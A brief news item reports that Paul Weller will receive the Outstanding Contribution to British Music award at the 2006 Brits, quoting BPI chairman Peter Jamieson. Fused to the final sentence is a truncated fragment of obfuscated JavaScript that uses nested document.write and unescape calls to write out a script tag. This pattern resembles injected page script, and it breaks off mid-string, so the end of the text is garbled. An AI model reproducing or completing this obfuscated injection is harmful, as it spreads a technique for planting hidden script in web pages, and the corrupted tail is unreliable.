Paul Weller is to receive the The Outstanding Contribution To British Music award at next year's Brits.
The former Jam and Style Council man will be honoured at the 2006 Brits ceremony at London's Earl's Court on February 15.
"The Outstanding Contribution Award is the highest honour the UK record industry can bestow. It is reserved for those whose influence, longevity and creativity puts them in the very top ranks of UK artists. Paul Weller is an artist who scores on every measure and typifies the range and quality of British music at its best," explained BPI Chairman Peter Jamieson of their decision.
The rest of next year's nominations will be announced on January 10.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
